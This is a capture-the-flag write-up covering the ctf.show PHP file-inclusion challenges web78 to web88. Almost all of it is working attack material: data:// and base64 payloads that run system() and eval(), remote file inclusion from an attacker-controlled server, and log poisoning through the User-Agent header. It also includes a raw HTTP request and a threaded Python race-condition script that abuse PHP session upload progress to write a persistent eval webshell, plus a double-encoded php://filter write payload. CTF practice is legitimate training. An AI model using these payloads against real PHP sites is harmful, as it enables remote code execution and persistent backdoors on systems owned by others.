web78
?file=data://text/plain,<?php system("cat flag.php");?>
Or pseudo-protocol reading also works.
web79
?file=data://text/plain,<?= system("cat flag*");?>
or
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
Where data:// can be replaced with data:
web80
Method one: remote file inclusion
Write horse below VPS, and then include remotely:
?file=http://118.***.***.***/1.txt
Method 2: The log file contains
?file=/var/log/nginx/access.log
So just write horse in the UA header. The log file inclusion of nginx and apache is also a test point.
web81
The method is the same as that of web80, but the remote include is not available because the colon is filtered, and the log file can be included.
web82
New posture, I learned what I learned, a very interesting hole, using PHP_SESSION_UPLOAD_PROGRESS for session file inclusion and conditional competition.
Reference link:
use session.upload_progress for file inclusion and deserialization penetration
Use this code to upload and capture packets:
<!DOCTYPE html>
<html>
<body>
<form action="" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
The command to be executed is written in PHP_SESSION_UPLOAD_PROGRESS:
Then start the bp no-parameter cyclic request, pay attention to changing the PHPSESSID.
On the other side, the same conditional competition includes the corresponding session file:
you can get the flag through conditional competition.
POST / HTTP/1.1
Host: 110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Cookie: PHPSESSID=feng
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Length: 317
------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php system("cat fl0g.php");?>
------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain
111
------WebKitFormBoundaryvGEmmKnnXVzQVMQB--
web83
Same as above, script:
import io
import sys
import requests
import threading
host = 'http://0df0bded-da5c-4bcc-92bd-e871bb1427a5.chall.ctf.show/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
host,
data={
"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
files={
"file":('a.txt', f)},
cookies={
'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'{host}?file=/tmp/sess_{sessid}')
# print(response.text)
if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
print('[+++]retry')
else:
print(response.text)
sys.exit(0)
with requests.session() as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)
web84
Same as above
web85
Same as above
web86
Same as above
web87
Reference article:
Talk about the magical use of php://filter
file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2531%252e%2570%2568%2570
content=aaPD9waHAgZXZhbCgkX1BPU1RbMF0pOz8%2B
File is php://filter/write=convert.base64-decode/resource=1.php, content removes the first two used to fill a and then base64 decryption is<?php eval($_POST[0]);?>
web88
Learn the back and forget the front. . I forgot that the data protocol can also be bypassed by base64 encoding, which is ridiculous.
Because only php is filtered, you can use the data protocol to bypass, and then base64 encoding to bypass:
?file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMF0pOw
The original result of base64 encryption is PD9waHAgZXZhbCgkX1BPU1RbMF0pOw==, but because = is filtered, it is enough to remove the = used for filling.